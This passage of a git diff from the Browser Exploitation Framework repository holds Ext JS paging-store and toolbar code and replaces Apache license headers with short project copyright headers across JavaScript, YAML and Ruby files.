-    loadData: function (data, append) {
-        if (this.expandData === true) {
-            var r = [];
-            for (var i = 0, len = data.length; i < len; i++) {
-                r[r.length] = [data[i]];
-            }
-            data = r;
-        }
-        Ext.ux.data.PagingArrayStore.superclass.loadData.call(this, data, append);
-    }
-});
-Ext.reg('pagingarraystore', Ext.ux.data.PagingArrayStore);
-
-Ext.ux.data.PagingSimpleStore = Ext.ux.data.PagingArrayStore;
-Ext.reg('pagingsimplestore', Ext.ux.data.PagingSimpleStore);
-
-Ext.ux.data.PagingGroupingStore = Ext.extend(Ext.ux.data.PagingStore, Ext.copyTo({}, Ext.data.GroupingStore.prototype, [
-    'constructor',
-    'remoteGroup',
-    'groupOnSort',
-    'groupDir',
-    'clearGrouping',
-    'groupBy',
-    'sort',
-    'applyGroupField',
-    'applyGrouping',
-    'getGroupState'
-]));
-Ext.reg('paginggroupingstore', Ext.ux.data.PagingGroupingStore);
-
-Ext.ux.PagingToolbar = Ext.extend(Ext.PagingToolbar, {
-    onLoad: function (store, r, o) {
-        if (!this.rendered) {
-            this.dsLoaded = [store, r, o];
-            return;
-        }
-        var p = this.getParams();
-        this.cursor = (o.params && o.params[p.start]) ? o.params[p.start] : 0;
-        this.onChange();
-        // *** end ***
-        // var d = this.getPageData(),
-        //     ap = d.activePage,
-        //     ps = d.pages;
-        // this.afterTextItem.setText(String.format(this.afterPageText, d.pages));
-        // this.inputItem.setValue(ap);
-        // this.first.setDisabled(ap == 1);
-        // this.prev.setDisabled(ap == 1);
-        // this.next.setDisabled(ap == ps);
-        // this.last.setDisabled(ap == ps);
-        // this.refresh.enable();
-        // this.updateInfo();
-        // this.fireEvent('change', this, d);
-    },
-    onChange: function () {
-        // *** add ***
-        var t = this.store.getTotalCount(),
-            s = this.pageSize;
-        if (this.cursor >= t) {
-            this.cursor = Math.ceil((t + 1) / s) * s;
-        }
-        // *** end ***
-        var d = this.getPageData(),
-            ap = d.activePage,
-            ps = d.pages;
-        this.afterTextItem.setText(String.format(this.afterPageText, d.pages));
-        this.inputItem.setValue(ap);
-        this.first.setDisabled(ap == 1);
-        this.prev.setDisabled(ap == 1);
-        this.next.setDisabled(ap == ps);
-        this.last.setDisabled(ap == ps);
-        this.refresh.enable();
-        this.updateInfo();
-        this.fireEvent('change', this, d);
-    },
-    onClear: function () {
-        this.cursor = 0;
-        this.onChange();
-    },
-    doRefresh: function () {
-        // *** add ***
-        delete this.store.lastParams;
-        // *** end ***
-        this.doLoad(this.cursor);
-    },
-    bindStore: function (store, initial) {
-        var doLoad;
-        if (!initial && this.store) {
-            if (store !== this.store && this.store.autoDestroy) {
-                this.store.destroy();
-            } else {
-                this.store.un('beforeload', this.beforeLoad, this);
-                this.store.un('load', this.onLoad, this);
-                this.store.un('exception', this.onLoadError, this);
-                // *** add ***
-                this.store.un('datachanged', this.onChange, this);
-                this.store.un('add', this.onChange, this);
-                this.store.un('remove', this.onChange, this);
-                this.store.un('clear', this.onClear, this);
-                // *** end ***
-            }
-            if (!store) {
-                this.store = null;
-            }
-        }
-        if (store) {
-            store = Ext.StoreMgr.lookup(store);
-            store.on({
-                scope: this,
-                beforeload: this.beforeLoad,
-                load: this.onLoad,
-                exception: this.onLoadError,
-                // *** add ***
-                datachanged: this.onChange,
-                add: this.onChange,
-                remove: this.onChange,
-                clear: this.onClear
-                // *** end ***
-            });
-            doLoad = true;
-        }
-        this.store = store;
-        if (doLoad) {
-            this.onLoad(store, null, {});
-        }
-    }
-});
-Ext.reg('ux.paging', Ext.ux.PagingToolbar);
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*
+ * PagingStore for Ext 3.2 - v0.5
+ */
+Ext.ns('Ext.ux.data');
+Ext.ux.data.PagingStore = Ext.extend(Ext.data.Store, {
+    add: function (records) {
+        records = [].concat(records);
+        if (records.length < 1) {
+            return;
+        }
+        for (var i = 0, len = records.length; i < len; i++) {
+            records[i].join(this);
+        }
+        var index = this.data.length;
+        this.data.addAll(records);
+        // *** add ***
+        if (this.allData) {
+            this.allData.addAll(records);
+        }
+        // *** end ***
+        if (this.snapshot) {
+            this.snapshot.addAll(records);
+        }
+        // *** add ***
+        this.totalLength += records.length;
+        // *** end ***
+        this.fireEvent('add', this, records, index);
+    },
+    remove: function (record) {
+        if (Ext.isArray(record)) {
+            Ext.each(record, function (r) {
+                this.remove(r);
+            }, this);
+            return;
+        }
+        // *** add ***
+        if (this != record.store) {
+            return;
+        }
+        record.join(null);
+        // *** end ***
+        var index = this.data.indexOf(record);
+        if (index > -1) {
+            // record.join(null);
+            this.data.removeAt(index);
+        }
+        if (this.pruneModifiedRecords) {
+            this.modified.remove(record);
+        }
+        // *** add ***
+        if (this.allData) {
+            this.allData.remove(record);
+        }
+        // *** end ***
+        if (this.snapshot) {
+            this.snapshot.remove(record);
+        }
+        // *** add ***
+        this.totalLength--;
+        // *** end ***
+        if (index > -1) {
+            this.fireEvent('remove', this, record, index);
+        }
+    },
+    removeAll: function (silent) {
+        // *** add ***
+        var items = [].concat((this.snapshot || this.allData || this.data).items);
+        // *** end ***
+        // var items = [];
+        // this.each(function (rec) {
+        //     items.push(rec);
+        // });
+        this.clearData();
+        // if (this.snapshot) {
+        //     this.snapshot.clear();
+        // }
+        if (this.pruneModifiedRecords) {
+            this.modified = [];
+        }
+        // *** add ***
+        this.totalLength = 0;
+        // *** end ***
+        if (silent !== true) {
+            this.fireEvent('clear', this, items);
+        }
+    },
+    insert: function (index, records) {
+        records = [].concat(records);
+        for (var i = 0, len = records.length; i < len; i++) {
+            this.data.insert(index, records[i]);
+            records[i].join(this);
+        }
+        // *** add ***
+        if (this.allData) {
+            this.allData.addAll(records);
+        }
+        // *** end ***
+        if (this.snapshot) {
+            this.snapshot.addAll(records);
+        }
+        // *** add ***
+        this.totalLength += records.length;
+        // *** end ***
+        this.fireEvent('add', this, records, index);
+    },
+    getById: function (id) {
+        // *** add ***
+        return (this.snapshot || this.allData || this.data).key(id);
+        // *** end ***
+        // return this.data.key(id);
+    },
+    clearData: function () {
+        // *** add ***
+        if (this.allData) {
+            this.data = this.allData;
+            delete this.allData;
+        }
+        if (this.snapshot) {
+            this.data = this.snapshot;
+            delete this.snapshot;
+        }
+        // *** end ***
+        this.data.each(function (rec) {
+            rec.join(null);
+        });
+        this.data.clear();
+    },
+    execute: function (action, rs, options, batch) {
+        if (!Ext.data.Api.isAction(action)) {
+            throw new Ext.data.Api.Error('execute', action);
+        }
+        options = Ext.applyIf(options || {}, {
+            params: {}
+        });
+        if (batch !== undefined) {
+            this.addToBatch(batch);
+        }
+        var doRequest = true;
+        if (action === 'read') {
+            doRequest = this.fireEvent('beforeload', this, options);
+            Ext.applyIf(options.params, this.baseParams);
+        }
+        else {
+            if (this.writer.listful === true && this.restful !== true) {
+                rs = (Ext.isArray(rs)) ? rs : [rs];
+            }
+            else if (Ext.isArray(rs) && rs.length == 1) {
+                rs = rs.shift();
+            }
+            if ((doRequest = this.fireEvent('beforewrite', this, action, rs, options)) !== false) {
+                this.writer.apply(options.params, this.baseParams, action, rs);
+            }
+        }
+        if (doRequest !== false) {
+            if (this.writer && this.proxy.url && !this.proxy.restful && !Ext.data.Api.hasUniqueUrl(this.proxy, action)) {
+                options.params.xaction = action;
+            }
+            // *** add ***
+            if (action === "read" && this.isPaging(Ext.apply({}, options.params))) {
+                (function () {
+                    if (this.allData) {
+                        this.data = this.allData;
+                        delete this.allData;
+                    }
+                    this.applyPaging();
+                    this.fireEvent("datachanged", this);
+                    var r = [].concat(this.data.items);
+                    this.fireEvent("load", this, r, options);
+                    if (options.callback) {
+                        options.callback.call(options.scope || this, r, options, true);
+                    }
+                }).defer(1, this);
+                return true;
+            }
+            // *** end ***
+            this.proxy.request(Ext.data.Api.actions[action], rs, options.params, this.reader, this.createCallback(action, rs, batch), this, options);
+        }
+        return doRequest;
+    },
+    loadRecords: function (o, options, success) {
+        if (this.isDestroyed === true) {
+            return;
+        }
+        if (!o || success === false) {
+            if (success !== false) {
+                this.fireEvent('load', this, [], options);
+            }
+            if (options.callback) {
+                options.callback.call(options.scope || this, [], options, false, o);
+            }
+            return;
+        }
+        var r = o.records,
+            t = o.totalRecords || r.length;
+        if (!options || options.add !== true) {
+            if (this.pruneModifiedRecords) {
+                this.modified = [];
+            }
+            for (var i = 0, len = r.length; i < len; i++) {
+                r[i].join(this);
+            }
+            //if (this.snapshot) {
+            //    this.data = this.snapshot;
+            //    delete this.snapshot;
+            //}
+            this.clearData();
+            this.data.addAll(r);
+            this.totalLength = t;
+            this.applySort();
+            // *** add ***
+            if (!this.allData) {
+                this.applyPaging();
+            }
+            if (r.length > this.getCount()) {
+                r = [].concat(this.data.items);
+            }
+            // *** end ***
+            this.fireEvent('datachanged', this);
+        } else {
+            this.totalLength = Math.max(t, this.data.length + r.length);
+            this.add(r);
+        }
+        this.fireEvent('load', this, r, options);
+        if (options.callback) {
+            options.callback.call(options.scope || this, r, options, true);
+        }
+    },
+    loadData: function (o, append) {
+        // *** add ***
+        this.isPaging(Ext.apply({}, this.lastOptions ? this.lastOptions.params : null, this.baseParams));
+        // *** end ***
+        var r = this.reader.readRecords(o);
+        this.loadRecords(r, {
+            add: append
+        }, true);
+    },
+    getTotalCount: function () {
+        // *** add ***
+        if (this.allData) {
+            return this.allData.getCount();
+        }
+        // *** end ***
+        return this.totalLength || 0;
+    },
+    sortData: function () {
+        var sortInfo = this.hasMultiSort ? this.multiSortInfo : this.sortInfo,
+            direction = sortInfo.direction || "ASC",
+            sorters = sortInfo.sorters,
+            sortFns = [];
+        if (!this.hasMultiSort) {
+            sorters = [{
+                direction: direction,
+                field: sortInfo.field
+            }];
+        }
+        for (var i = 0, j = sorters.length; i < j; i++) {
+            sortFns.push(this.createSortFunction(sorters[i].field, sorters[i].direction));
+        }
+        if (!sortFns.length) {
+            return;
+        }
+        var directionModifier = direction.toUpperCase() == "DESC" ? -1 : 1;
+        var fn = function (r1, r2) {
+            var result = sortFns[0].call(this, r1, r2);
+            if (sortFns.length > 1) {
+                for (var i = 1, j = sortFns.length; i < j; i++) {
+                    result = result || sortFns[i].call(this, r1, r2);
+                }
+            }
+            return directionModifier * result;
+        };
+        // *** add ***
+        if (this.allData) {
+            this.data = this.allData;
+            delete this.allData;
+        }
+        // *** end ***
+        this.data.sort(direction, fn);
+        if (this.snapshot && this.snapshot != this.data) {
+            this.snapshot.sort(direction, fn);
+        }
+        // *** add ***
+        this.applyPaging();
+        // *** end ***
+    },
+    filterBy: function (fn, scope) {
+        // *** add ***
+        this.snapshot = this.snapshot || this.allData || this.data;
+        // *** end ***
+        // this.snapshot = this.snapshot || this.data;
+        this.data = this.queryBy(fn, scope || this);
+        // *** add ***
+        this.applyPaging();
+        // *** end ***
+        this.fireEvent('datachanged', this);
+    },
+    clearFilter: function (suppressEvent) {
+        if (this.isFiltered()) {
+            this.data = this.snapshot;
+            delete this.snapshot;
+            // *** add ***
+            delete this.allData;
+            this.applyPaging();
+            // *** end ***
+            if (suppressEvent !== true) {
+                this.fireEvent('datachanged', this);
+            }
+        }
+    },
+    isFiltered: function () {
+        // *** add ***
+        return !!this.snapshot && this.snapshot != (this.allData || this.data);
+        // *** end ***
+        // return !!this.snapshot && this.snapshot != this.data;
+    },
+    queryBy: function (fn, scope) {
+        // *** add ***
+        var data = this.snapshot || this.allData || this.data;
+        // *** end ***
+        // var data = this.snapshot || this.data;
+        return data.filterBy(fn, scope || this);
+    },
+    collect: function (dataIndex, allowNull, bypassFilter) {
+        // *** add ***
+        var d = (bypassFilter === true ? this.snapshot || this.allData || this.data : this.data).items;
+        // *** end ***
+        // var d = (bypassFilter === true && this.snapshot) ? this.snapshot.items : this.data.items;
+        var v, sv, r = [],
+            l = {};
+        for (var i = 0, len = d.length; i < len; i++) {
+            v = d[i].data[dataIndex];
+            sv = String(v);
+            if ((allowNull || !Ext.isEmpty(v)) && !l[sv]) {
+                l[sv] = true;
+                r[r.length] = v;
+            }
+        }
+        return r;
+    },
+    findInsertIndex : function(record){
+        this.suspendEvents();
+        var data = this.data.clone();
+        this.data.add(record);
+        this.applySort();
+        var index = this.data.indexOf(record);
+        this.data = data;
+        // *** add ***
+        this.totalLength--;
+        // *** end ***
+        this.resumeEvents();
+        return index;
+    },
+    // *** add ***
+    isPaging: function (params) {
+        var pn = this.paramNames,
+            start = params[pn.start],
+            limit = params[pn.limit];
+        if ((typeof start != 'number') || (typeof limit != 'number')) {
+            delete this.start;
+            delete this.limit;
+            this.lastParams = params;
+            return false;
+        }
+        this.start = start;
+        this.limit = limit;
+        delete params[pn.start];
+        delete params[pn.limit];
+        var lastParams = this.lastParams;
+        this.lastParams = params;
+        if (!this.proxy) {
+            return true;
+        }
+        if (!lastParams) {
+            return false;
+        }
+        for (var param in params) {
+            if (params.hasOwnProperty(param) && (params[param] !== lastParams[param])) {
+                return false;
+            }
+        }
+        for (param in lastParams) {
+            if (lastParams.hasOwnProperty(param) && (params[param] !== lastParams[param])) {
+                return false;
+            }
+        }
+        return true;
+    },
+    applyPaging: function () {
+        var start = this.start,
+            limit = this.limit;
+        if ((typeof start == 'number') && (typeof limit == 'number')) {
+            var allData = this.data,
+                data = new Ext.util.MixedCollection(allData.allowFunctions, allData.getKey);
+            data.items = allData.items.slice(start, start + limit);
+            data.keys = allData.keys.slice(start, start + limit);
+            var len = data.length = data.items.length;
+            var map = {};
+            for (var i = 0; i < len; i++) {
+                var item = data.items[i];
+                map[data.getKey(item)] = item;
+            }
+            data.map = map;
+            this.allData = allData;
+            this.data = data;
+        }
+    }
+    // *** end ***
+});
+
+Ext.ux.data.PagingDirectStore = Ext.extend(Ext.ux.data.PagingStore, {
+    constructor: Ext.data.DirectStore.prototype.constructor
+});
+Ext.reg('pagingdirectstore', Ext.ux.data.PagingDirectStore);
+
+Ext.ux.data.PagingJsonStore = Ext.extend(Ext.ux.data.PagingStore, {
+    constructor: Ext.data.JsonStore.prototype.constructor
+});
+Ext.reg('pagingjsonstore', Ext.ux.data.PagingJsonStore);
+
+Ext.ux.data.PagingXmlStore = Ext.extend(Ext.ux.data.PagingStore, {
+    constructor: Ext.data.XmlStore.prototype.constructor
+});
+Ext.reg('pagingxmlstore', Ext.ux.data.PagingXmlStore);
+
+Ext.ux.data.PagingArrayStore = Ext.extend(Ext.ux.data.PagingStore, {
+    constructor: Ext.data.ArrayStore.prototype.constructor,
+    loadData: function (data, append) {
+        if (this.expandData === true) {
+            var r = [];
+            for (var i = 0, len = data.length; i < len; i++) {
+                r[r.length] = [data[i]];
+            }
+            data = r;
+        }
+        Ext.ux.data.PagingArrayStore.superclass.loadData.call(this, data, append);
+    }
+});
+Ext.reg('pagingarraystore', Ext.ux.data.PagingArrayStore);
+
+Ext.ux.data.PagingSimpleStore = Ext.ux.data.PagingArrayStore;
+Ext.reg('pagingsimplestore', Ext.ux.data.PagingSimpleStore);
+
+Ext.ux.data.PagingGroupingStore = Ext.extend(Ext.ux.data.PagingStore, Ext.copyTo({}, Ext.data.GroupingStore.prototype, [
+    'constructor',
+    'remoteGroup',
+    'groupOnSort',
+    'groupDir',
+    'clearGrouping',
+    'groupBy',
+    'sort',
+    'applyGroupField',
+    'applyGrouping',
+    'getGroupState'
+]));
+Ext.reg('paginggroupingstore', Ext.ux.data.PagingGroupingStore);
+
+Ext.ux.PagingToolbar = Ext.extend(Ext.PagingToolbar, {
+    onLoad: function (store, r, o) {
+        if (!this.rendered) {
+            this.dsLoaded = [store, r, o];
+            return;
+        }
+        var p = this.getParams();
+        this.cursor = (o.params && o.params[p.start]) ? o.params[p.start] : 0;
+        this.onChange();
+        // *** end ***
+        // var d = this.getPageData(),
+        //     ap = d.activePage,
+        //     ps = d.pages;
+        // this.afterTextItem.setText(String.format(this.afterPageText, d.pages));
+        // this.inputItem.setValue(ap);
+        // this.first.setDisabled(ap == 1);
+        // this.prev.setDisabled(ap == 1);
+        // this.next.setDisabled(ap == ps);
+        // this.last.setDisabled(ap == ps);
+        // this.refresh.enable();
+        // this.updateInfo();
+        // this.fireEvent('change', this, d);
+    },
+    onChange: function () {
+        // *** add ***
+        var t = this.store.getTotalCount(),
+            s = this.pageSize;
+        if (this.cursor >= t) {
+            this.cursor = Math.ceil((t + 1) / s) * s;
+        }
+        // *** end ***
+        var d = this.getPageData(),
+            ap = d.activePage,
+            ps = d.pages;
+        this.afterTextItem.setText(String.format(this.afterPageText, d.pages));
+        this.inputItem.setValue(ap);
+        this.first.setDisabled(ap == 1);
+        this.prev.setDisabled(ap == 1);
+        this.next.setDisabled(ap == ps);
+        this.last.setDisabled(ap == ps);
+        this.refresh.enable();
+        this.updateInfo();
+        this.fireEvent('change', this, d);
+    },
+    onClear: function () {
+        this.cursor = 0;
+        this.onChange();
+    },
+    doRefresh: function () {
+        // *** add ***
+        delete this.store.lastParams;
+        // *** end ***
+        this.doLoad(this.cursor);
+    },
+    bindStore: function (store, initial) {
+        var doLoad;
+        if (!initial && this.store) {
+            if (store !== this.store && this.store.autoDestroy) {
+                this.store.destroy();
+            } else {
+                this.store.un('beforeload', this.beforeLoad, this);
+                this.store.un('load', this.onLoad, this);
+                this.store.un('exception', this.onLoadError, this);
+                // *** add ***
+                this.store.un('datachanged', this.onChange, this);
+                this.store.un('add', this.onChange, this);
+                this.store.un('remove', this.onChange, this);
+                this.store.un('clear', this.onClear, this);
+                // *** end ***
+            }
+            if (!store) {
+                this.store = null;
+            }
+        }
+        if (store) {
+            store = Ext.StoreMgr.lookup(store);
+            store.on({
+                scope: this,
+                beforeload: this.beforeLoad,
+                load: this.onLoad,
+                exception: this.onLoadError,
+                // *** add ***
+                datachanged: this.onChange,
+                add: this.onChange,
+                remove: this.onChange,
+                clear: this.onClear
+                // *** end ***
+            });
+            doLoad = true;
+        }
+        this.store = store;
+        if (doLoad) {
+            this.onLoad(store, null, {});
+        }
+    }
+});
+Ext.reg('ux.paging', Ext.ux.PagingToolbar);
diff --git a/extensions/admin_ui/media/javascript/ux/StatusBar.js b/extensions/admin_ui/media/javascript/ux/StatusBar.js
index ac1e5f5c6..9b70abe46 100644
--- a/extensions/admin_ui/media/javascript/ux/StatusBar.js
+++ b/extensions/admin_ui/media/javascript/ux/StatusBar.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * Ext JS Library 3.1.1
  * Copyright(c) 2006-2010 Ext JS, LLC
diff --git a/extensions/admin_ui/media/javascript/ux/TabCloseMenu.js b/extensions/admin_ui/media/javascript/ux/TabCloseMenu.js
index 7ed3a50ac..a9bfde238 100644
--- a/extensions/admin_ui/media/javascript/ux/TabCloseMenu.js
+++ b/extensions/admin_ui/media/javascript/ux/TabCloseMenu.js
@@ -1,73 +1,64 @@
-//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-/*!
- * Ext JS Library 3.1.1
- * Copyright(c) 2006-2010 Ext JS, LLC
- * licensing@extjs.com
- * http://www.extjs.com/license
- */
-/**
- * @class Ext.ux.TabCloseMenu
- * @extends Object 
- * Plugin (ptype = 'tabclosemenu') for adding a close context menu to tabs.
- * 
- * @ptype tabclosemenu
- */
-Ext.ux.TabCloseMenu = function(){
-    var tabs, menu, ctxItem;
-    this.init = function(tp){
-        tabs = tp;
-        tabs.on('contextmenu', onContextMenu);
-    };
-
-    function onContextMenu(ts, item, e){
-        if(!menu){ // create context menu on first right click
-            menu = new Ext.menu.Menu({            
-            items: [{
-                id: tabs.id + '-close',
-                text: 'Close Tab',
-                handler : function(){
-                    tabs.remove(ctxItem);
-                }
-            },{
-                id: tabs.id + '-close-others',
-                text: 'Close Other Tabs',
-                handler : function(){
-                    tabs.items.each(function(item){
-                        if(item.closable && item != ctxItem){
-                            tabs.remove(item);
-                        }
-                    });
-                }
-            }]});
-        }
-        ctxItem = item;
-        var items = menu.items;
-        items.get(tabs.id + '-close').setDisabled(!item.closable);
-        var disableOthers = true;
-        tabs.items.each(function(){
-            if(this != item && this.closable){
-                disableOthers = false;
-                return false;
-            }
-        });
-        items.get(tabs.id + '-close-others').setDisabled(disableOthers);
-	e.stopEvent();
-        menu.showAt(e.getPoint());
-    }
-};
-
-Ext.preg('tabclosemenu', Ext.ux.TabCloseMenu);
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*!
+ * Ext JS Library 3.1.1
+ * Copyright(c) 2006-2010 Ext JS, LLC
+ * licensing@extjs.com
+ * http://www.extjs.com/license
+ */
+/**
+ * @class Ext.ux.TabCloseMenu
+ * @extends Object 
+ * Plugin (ptype = 'tabclosemenu') for adding a close context menu to tabs.
+ * 
+ * @ptype tabclosemenu
+ */
+Ext.ux.TabCloseMenu = function(){
+    var tabs, menu, ctxItem;
+    this.init = function(tp){
+        tabs = tp;
+        tabs.on('contextmenu', onContextMenu);
+    };
+
+    function onContextMenu(ts, item, e){
+        if(!menu){ // create context menu on first right click
+            menu = new Ext.menu.Menu({            
+            items: [{
+                id: tabs.id + '-close',
+                text: 'Close Tab',
+                handler : function(){
+                    tabs.remove(ctxItem);
+                }
+            },{
+                id: tabs.id + '-close-others',
+                text: 'Close Other Tabs',
+                handler : function(){
+                    tabs.items.each(function(item){
+                        if(item.closable && item != ctxItem){
+                            tabs.remove(item);
+                        }
+                    });
+                }
+            }]});
+        }
+        ctxItem = item;
+        var items = menu.items;
+        items.get(tabs.id + '-close').setDisabled(!item.closable);
+        var disableOthers = true;
+        tabs.items.each(function(){
+            if(this != item && this.closable){
+                disableOthers = false;
+                return false;
+            }
+        });
+        items.get(tabs.id + '-close-others').setDisabled(disableOthers);
+	e.stopEvent();
+        menu.showAt(e.getPoint());
+    }
+};
+
+Ext.preg('tabclosemenu', Ext.ux.TabCloseMenu);
diff --git a/extensions/autoloader/config.yaml b/extensions/autoloader/config.yaml
index dc560be9f..419798363 100644
--- a/extensions/autoloader/config.yaml
+++ b/extensions/autoloader/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     extension:
diff --git a/extensions/autoloader/extension.rb b/extensions/autoloader/extension.rb
index 241d02885..b63fbf399 100644
--- a/extensions/autoloader/extension.rb
+++ b/extensions/autoloader/extension.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/autoloader/model.rb b/extensions/autoloader/model.rb
index a6f268706..c83c441b5 100644
--- a/extensions/autoloader/model.rb
+++ b/extensions/autoloader/model.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
diff --git a/extensions/console/config.yaml b/extensions/console/config.yaml
index 6612e66d3..baa7e4865 100644
--- a/extensions/console/config.yaml
+++ b/extensions/console/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     extension:
diff --git a/extensions/console/extension.rb b/extensions/console/extension.rb
index 8574e46cc..cd3253a8a 100644
--- a/extensions/console/extension.rb
+++ b/extensions/console/extension.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/console/lib/command_dispatcher.rb b/extensions/console/lib/command_dispatcher.rb
index ffade9889..d74602bb7 100644
--- a/extensions/console/lib/command_dispatcher.rb
+++ b/extensions/console/lib/command_dispatcher.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/console/lib/command_dispatcher/command.rb b/extensions/console/lib/command_dispatcher/command.rb
index 03c3a7787..e3fb00db6 100644
--- a/extensions/console/lib/command_dispatcher/command.rb
+++ b/extensions/console/lib/command_dispatcher/command.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/console/lib/command_dispatcher/core.rb b/extensions/console/lib/command_dispatcher/core.rb
index a7e7905b6..59ac7c82a 100644
--- a/extensions/console/lib/command_dispatcher/core.rb
+++ b/extensions/console/lib/command_dispatcher/core.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
